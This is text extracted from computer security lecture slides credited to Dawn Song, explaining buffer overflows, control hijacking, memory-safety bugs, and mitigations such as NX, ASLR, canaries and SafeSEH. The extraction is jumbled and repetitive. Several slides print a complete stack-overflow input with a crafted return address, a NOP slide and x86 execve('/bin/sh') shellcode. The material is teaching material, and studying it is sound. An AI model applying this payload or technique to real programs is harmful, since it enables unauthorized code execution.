urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x08048564
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
0xbffff760
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
OVERWRITE POINT!
Basic Stack Exploit
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x0804f764
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
0xbffff760
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
OVERWRITE POINT!
Basic Stack Exploit
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0x08fff764
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
0xbffff760
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
OVERWRITE POINT!
0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
in
return address
stack frame ptr
i
0x0804a008
0xfffff764
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
0xbffff760
Basic Stack Exploit
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)
0xbffff764
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
OVERWRITE POINT!
Basic Stack Exploit
fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)0xbffff740
0xbffff6c4
0x080485a2
0xbffff758
0x00000019
fpreturn address
stack frame ptr
urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
in
return address
stack frame ptr
i
shellcode
0x61616161
0xfffff764
0x61616161
0x616161610x616161610x616161610x616161610x00000000
.
.0xfffff764
.
.0x414141410x205445470xbffff6c40x00000001
(Unallocated)
out0xbffff6b4
0xbffff6b0
0xbffff6ac
0xbffff6a8
0xbffff69c
0xbffff760
0xbffff764
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.0xbffff7d8
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
ACTIVATE POINT!
BREAK
Shellcode----------------------------------------
NOPNOP
...NOP
crafted return address
buffer
The NOP Slide
‘/x90’
Problem: how does attacker determine ret-address?
Solution: NOP slide• Guess approximate stack state when the function
is called• Insert many NOPs before Shell Code
arguments
return address
stack frame pointer
buffer
To previous stack frame pointer
To the instruction at which this function was called
The NOP Slide
fpreturn address
stack frame ptr
urlheader_ok?,?,?,buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok
0xbffff75c
0xbffff758
0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c
.
.
.0xbffff6c40xbffff6c00xbffff74c0xbffff748
shellcode0x909090900x90909090
...0x90909090
0x90909090
0xfffff764
0x61616161
0x616161610x616161610x616161610x616161610x00000000
...0x414141410x205445470xbffff6c40x00000001
(Unallocated)
0xbffff760
fileGET AAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xff/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
(input file)
(copy_lower)
0xbffff764
9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }
1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}
23: /** main to load a file and run parse */
parse.c
BREAK
Dawn Song 68
More on Stack Smashing
• Some complications on Shellcode:– Shellcode should not contain the ‘\0’ character.– Overflow should not crash program before the
frame’s function exits• Sample remote stack smashing overflows:
– (2007) Overflow in Windows animated cursors (ANI).
– (2005) Overflow in Symantic Virus DetectionLoadAniIcon()
test.GetPrivateProfileString “file”, [long string]
Many unsafe libc functions
strcpy (char *dest, const char *src)strcat (char *de st, const char *src)gets (char *s)scanf ( const char *format, … ) and many more.
• “Safe” libc versions strncpy(), strncat() are misleading– e.g. strncpy() may leave string unterminated.
• Windows C run time (CRT):– strcpy_s (*dest, DestSize, *src): ensures proper termination
Dawn Song 70
arguments
return address
stack frame pointer
buffer
ShellCode
crafted return address
buffer
To previous stack frame pointer
To the instruction at which this function was called
arguments
return address
stack frame pointer
buffer
General Control Hijacking: Return Address
Overwrite Step: Overwrite return address to point to your code.
Activate Step: Return out of frame and into your code.
Dawn Song 71
arguments
return address
stack frame pointer
local function pointerbuffer
ShellCode
crafted local function pointerbuffer
To instructions for a function
arguments
return address
stack frame pointer
local function pointerbuffer
General Control Hijacking: Local Fn Ptr
Overwrite Step: Overwrite local function pointer to point to your code.
Activate Step: Call that local function variable.
Dawn Song 72
General Control Hijacking: Function Pointer in the Heap
Overwrite Step: Overwrite entries in a vtable for Object T.
Activate Step: Call any method from Object T
ptr
data
Object TFP1:
FP2:
FP3:
buffer
vtablemethod #1
method #2
method #3
ptr
data
Object TFP1:
FP2:
FP3:
buffer
vtablemethod #1
method #2
method #3
ptr
data
Object Tcrafted FP1:
crafted FP2:
crafted FP3:
buffer
vtableshellcode
shellcode
shellcode
Dawn Song 73
General Control Hijacking: Function Pointer in the Heap
Overwrite Step: Overwrite pointer to vtable on heap to point to a crafted vtable.
Activate Step: Call any method from Object T
ptr
data
buffer
Object TFP1:
FP2:
FP3:
vtable
method #1
method #2
method #3
ptr
data
buffer
FP1:
FP2:
FP3:
crafted FP1:
crafted FP2:
crafted FP3:
crafted ptr
buffer
vtable
method #1
method #2
method #3
shellcode
shellcode
shellcode
(crafted vtable)
Dawn Song 74
Attack: return-to-libc (arc injection)
• Control hijacking without executing code
arguments
return address
stack frame pointer
buffer
(stack)
exec()
printf()
“/bin/shell”
(libc.so)
Dawn Song 75
General Control Hijacking
Control Flow Pointer
jump to address longjmp pointer
function pointer in heap
return addressframe pointer
exception Handlerfunction pointer as local variable shellcode, library
(return to libc)
Overwrite Step:Find some way to modify a Control Flow Pointer to point to your shellcode, library entry point, or other code of interest.
Activate Step:Find some way to activate that modified Control Flow Pointer.
expected code
Dawn Song 76
Instances of Control HijackingLocation in Memory
Control Flow Pointer
How to activate
Stack Return Address Return from function
Stack Frame Pointer Return from function
Stack Function Pointers as local variables
Reference and call function pointer
Stack Exception Handler Trigger Exception
Heap Function pointer in heap (i.e. method of an object)
Reference and call function pointer
Anywhere setjmp and longjmp program state buffer
Call longjmp
Ret AddrFrame Ptr
buf
(stack frame)
exception handerslocal fn ptrs
ptr
data
Object TFP1:
FP2:
FP3:
vtablemethod #1method #2method #3
(HEAP)
buf
saved pointer
…
other data
longjmp
buf
ptr
data
Object TFP1:
FP2:
FP3:
vtablemethod #1method #2method #3
(HEAP)
buf
Dawn Song 77
arguments
return address
stack frame pointer
authentication_variablebuffer
Data Hijacking
Normal Situation:User types in a password which is stored in the buffer, and if the user is successfully authenticated, the authentication_variable is set.
Modifying data in a way not intended Example: Authentication variable
arguments
return address
stack frame pointer
authentication_variablebuffer
Exploited Situation:User types in a password which is long enough to overflow buffer and into the authentication_variable. The user is now unintentionally authenticated.
arguments
return address
stack frame pointer
authentication_variablebuffer
Dawn Song 78
Software Security (II): Other types of software vulnerabilities
Computer Security Course. Dawn Song
Dawn Song 79
Common Coding Errors
• Input validation vulnerabilities
• Memory management vulnerabilities
• TOCTTOU vulnerabilities
Dawn Song 80
Input validation vulnerabilities
• Program requires certain assumptions on inputs to run properly
• Without correct checking for inputs– Program gets exploited
• Example: – Buffer overflow– Format string
Dawn Song 81
Example I
unsigned int size;Data **datalist;
size = GetUntrustedSizeValue();datalist = (data **)malloc(size * sizeof(Data *));for(int i=0; i<size; i++) { datalist[i] = InitData();}datalist[size] = NULL;...
Dawn Song 82
Example II
• char buf[80]; void vulnerable() { int len = read_int_from_network(); char *p = read_string_from_network(); if (len > sizeof buf) { error("length too large, nice try!"); return; } memcpy(buf, p, len);}
• What's wrong with this code?• Hint – memcpy() prototype:
– void *memcpy(void *dest, const void *src, size_t n);
• Definition of size_t: typedef unsigned int size_t;• Do you see it now?
Dawn Song 83
Implicit Casting Bug• Attacker provides a negative value for len
– if won’t notice anything wrong– Execute memcpy() with negative third arg– Third arg is implicitly cast to an unsigned int, and
becomes a very large positive int– memcpy() copies huge amount of memory into buf,
yielding a buffer overrun!• A signed/unsigned or an implicit casting bug
– Very nasty – hard to spot• C compiler doesn’t warn about type mismatch between signed int and unsigned int– Silently inserts an implicit cast
Dawn Song 84
Example III (Integer Overflow)• size_t len = read_int_from_network();
char *buf;buf = malloc(len+5);read(fd, buf, len);...
• What’s wrong with this code?– No buffer overrun problems (5 spare bytes)– No sign problems (all ints are unsigned)
• But, len+5 can overflow if len is too large– If len = 0xFFFFFFFF, then len+5 is 4 – Allocate 4-byte buffer then read a lot more than 4 bytes
into it: classic buffer overrun!• Know programming language’s semantics well to
avoid pitfalls
Dawn Song 85
Example IVchar* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);}
• Use-after-free• Corrupt memory
http://cwe.mitre.org
Dawn Song 86
Example IVchar* ptr = (char*)malloc (SIZE);
...if (abrt) { free(ptr);}...free(ptr);
• Double-free error• Corrupts memory-management data structure
http://owasp.org
Dawn Song 87
What are software vulnerabilities?
• Flaws in software • Break certain assumptions important for security
– What assumptions broken in buffer overflow?
Dawn Song 88
Why does software have vulnerabilities?
• Programmers are humans!– Humans make mistakes!
• Programmers were not security aware
• Programming languages are not designed well for security
Dawn Song 89
What can you do?
• Programmers are humans!– Humans make mistakes! – Use tools! (next lecture)
• Programmers were not security aware– Learn about different common classes of coding errors
• Programming languages are not designed well for security– Pick better languages
Dawn Song 90
Software Security (III): Buffer-overflow Defenses
Computer Security Course. Dawn Song
Dawn Song 91
Preventing hijacking attacksFix bugs:• Audit software
• Automated tools: Coverity, Prefast/Prefix, Fortify• Rewrite software in a type-safe language (Java, ML)
• Difficult for existing (legacy) code …
Allow overflow, but prevent code execution
Add runtime code to detect overflows exploits:• Halt process when overflow exploit detected• StackGuard, Libsafe
Dawn Song 92
Code Injection Arc Injection
Stack
Heap
Exception Handlers
Control-hijacking Attack Space
Defenses/Mitigations
Dawn Song 93
Defense I: non-execute (W^X)
Prevent attack code execution by marking stack and heap as non-executable
• NX-bit on AMD Athlon 64, XD-bit on Intel P4 Prescott– NX bit in every Page Table Entry (PTE)
• Deployment:
–Linux (via PaX project); OpenBSD–Windows: since XP SP2 (DEP)
• Boot.ini : /noexecute=OptIn or AlwaysOn• Visual Studio: /NXCompat[:NO]
Dawn Song 94
• Limitations:– Some apps need executable heap (e.g. JITs).– Does not defend against `return-to-libc’ exploits
Code Injection Arc Injection
Stack
Heap
Exception Handlers
Effectiveness and Limitations
Defenses/Mitigations
* When Applicable
Code Injection Arc Injection
Stack Non-Execute (NX)*
Heap Non-Execute (NX)*
Exception Handlers
Non-Execute (NX)*
Dawn Song 95
Defense II: Address Randomization
Reserved for Kernal
user stack
shared libraries
run time heap
static data segment
text segment (program)
unused
-0xC0000000
-0x40000000
-0x08048000
-0x00000000
-0xFFFFFFFF
-0xBFF9AB20
Reserved for Kernal
unused
user stack
shared libraries
run time heap
static data segment
text segment (program)
unused
• ASLR: (Address Space Layout Randomization)
– Start stack at a random location– Start heap at a random locatioin– Map shared libraries to rand location in process
memory Attacker cannot jump directly to exec function
– Deployment: (/DynamicBase)
• Windows Vista: 8 bits of randomness for DLLs
– aligned to 64K page in a 16MB region 256 choices
• Linux (via PaX): 16 bits of randomness for libraries
– More effective on 64-bit architectures
• Other randomization methods:– Sys-call randomization: randomize sys-call id’s
– Instruction Set Randomization (ISR)
Dawn Song 96
• Limitations– Randomness is limited– Some vulnerabilities can allow secret to be leaked
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLR
ASLR
Heap Non-Execute (NX)*ASLR
ASLR
Exception Handlers
Non-Execute (NX)*ASLR
ASLR
Defenses/Mitigations
* When Applicable
Effectiveness and Limitations
Dawn Song 97
Defense III: StackGuard• Run time tests for stack integrity • Embed “canaries” in stack frames
and verify their integrity prior to function return
arguments
return address
stack frame pointer
CANARY
local variables
Dawn Song 98
Canary Types
• Random canary:– Random string chosen at program startup.– Insert canary string into every stack frame.– Verify canary before returning from function.
• Exit program if canary changed. Turns potential exploit into DoS.
– To exploit successfully, attacker must learn current random string.
• Terminator canary: Canary = {0, newline, linefeed, EOF}
– String functions will not copy beyond terminator.– Attacker cannot use string functions to corrupt stack.
Dawn Song 99
StackGuard (Cont.)• StackGuard implemented as a GCC patch.
– Program must be recompiled.
• Low performance effects: 8% for Apache.
• Note: Canaries don’t provide full proof protection.– Some stack smashing attacks leave canaries unchanged
• Heap protection: PointGuard.– Protects function pointers and setjmp buffers by
encrypting them: e.g. XOR with random cookie– Less effective, more noticeable performance effects
Dawn Song 100
StackGuard enhancements: ProPolice
• ProPolice (IBM) - gcc 3.4.1. (-fstack-protector)
– Rearrange stack layout to prevent ptr overflow.
StackGrowth pointers, but no arrays
StringGrowth Protects pointer args and local
pointers from a buffer overflow
arguments
return address
stack frame pointer
CANARY
local string buffers
local string variables
local non-buffer variables
copy of pointer args
Dawn Song 101
MS Visual Studio /GS [since 2003]
Compiler /GS option:– Combination of ProPolice and Random canary.– If cookie mismatch, default behavior is to call _exit(3)
Function prolog: sub esp, 8 // allocate 8 bytes for cookie mov eax, DWORD PTR ___security_cookie xor eax, esp // xor cookie with current esp mov DWORD PTR [esp+8], eax // save in stack
Function epilog: mov ecx, DWORD PTR [esp+8] xor ecx, esp call @__security_check_cookie@4 add esp, 8
Enhanced /GS in Visual Studio 2010:– /GS protection added to all functions, unless can be proven unnecessary
Dawn Song 102
/GS stack frame
StackGrowth
pointers, but no arrays
StringGrowth
Canary protects ret-addr and exception handler frame
arguments
return address
stack frame pointer
exception handlers
CANARY
local string buffers
local string variables
local non-buffer variables
Dawn Song 103
• Limitation:– Evasion with exception handler
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GS
ASLRStacKGuard(Canaries)ProPolice/GS
Heap Non-Execute (NX)*ASLRPointGuard
ASLRPointGuard
Exception Handlers
Non-Execute (NX)*ASLR
ASLR
Defenses/Mitigations* When Applicable
Effectiveness and Limitations
Evading /GS with exception handlers
• When exception is thrown, dispatcher walks up exception list until handler is found (else use default handler)
After overflow: handler points to attacker’s codeexception triggered control hijack⇒
Main point: exception is triggered before canary is checked
handler
next
handler
next
buffer
handler
nextSEH frame
handler
next
handler
crafted ptr
buffer
handler
next
Dawn Song 105
Defense III: SAFESEH and SEHOP
• /SAFESEH: linker flag– Linker produces a binary with a table of safe exception handlers– System will not jump to exception handler not on list
• /SEHOP: platform defense (since win vista SP1)– Observation: SEH attacks typically corrupt the “next” entry in SEH list.– SEHOP: add a dummy record at top of SEH list– When exception occurs, dispatcher walks up list and verifies dummy
record is there. If not, terminates process.
Dawn Song 106
• Limitations:– Require recompilation
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GS
ASLRStacKGuard(Canaries)ProPolice/GS
Heap Non-Execute (NX)*ASLRPointGuard
ASLRPointGuard
Exception Handlers
Non-Execute (NX)*ASLRSAFESEH and SEHOP
ASLRSAFESEH and SEHOP
Defenses/Mitigations* When Applicable
Effectiveness and Limitations
Dawn Song 107
Defense IV: Libsafe
• Dynamically loaded library (no need to recompile app.)
• Intercepts calls to strcpy (dest, src)
– Validates sufficient space in current stack frame:
|frame-pointer – dest| > strlen(src)
– If so, does strcpy. Otherwise, terminates application
Libsafe strcpy
return address
stack frme pointer
buf
src
dest
ret
sfp
main
Dawn Song 108
• Limitations:– Limited protection
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSlibsafe
ASLRStacKGuard(Canaries)ProPolice/GSlibsafe
Heap Non-Execute (NX)*ASLRPointGuard
ASLRPointGuard
Exception Handlers
Non-Execute (NX)*ASLRSAFESEH and SEHOP
ASLRSAFESEH and SEHOP
Defenses/Mitigations * When Applicable
Effectiveness and Limitations
Dawn Song 109
Other Defenses StackShield
At function prologue, copy return address RET and SFP to “safe” location (beginning of data segment)
Upon return, check that RET and SFP is equal to copy.
Implemented as assembler file processor (GCC)
Control Flow Integrity (CFI)
A combination of static and dynamic checking Statically determine program control flow
Dynamically enforce control flow integrity
Dawn Song 110
• Many different kinds of attacks. Not one silver bullet defense.
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSStackShieldlibsafe
ASLRStacKGuard(Canaries)ProPolice/GSStackShieldlibsafe
Heap Non-Execute (NX)*ASLRPointGuard
ASLRPointGuard
Exception Handlers
Non-Execute (NX)*ASLRSAFESEH and SEHOP
ASLRSAFESEH and SEHOP
Defenses/Mitigations * When Applicable
Effectiveness and Limitations
Dawn Song 111
Dawn Song 112
(partial) Defenses• Protect heap function pointers
(e.g. PointGuard)
• Better browser architecture:– Store JavaScript strings in a separate
heap from browser heap
• OpenBSD heap overflow protection:
• Nozzle [RLZ’08] : detect sprays by prevalence of code on heap
non-writable pages
prevents cross-pageoverflows
(HEAP)
Dawn Song 113
• Many different kinds of attacks. Not one silver bullet defense.
Code Injection Arc Injection
Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSStackShieldControl Flow Integrity (CFI)
ASLRStacKGuard(Canaries)ProPolice/GSStackShieldControl Flow Integrity (CFI)
Heap Non-Execute (NX)*ASLRPointGuardOpenBSD Heap overflow protectionNozzle
ASLRPointGuardOpenBSD Heap overflow protectionNozzle
Exception Handlers
Non-Execute (NX)*ASLRSAFESEH and SEHOP
ASLRSAFESEH and SEHOP
Defenses/Mitigations
Others:
* When Applicable
Libsafe
Effectiveness and Limitations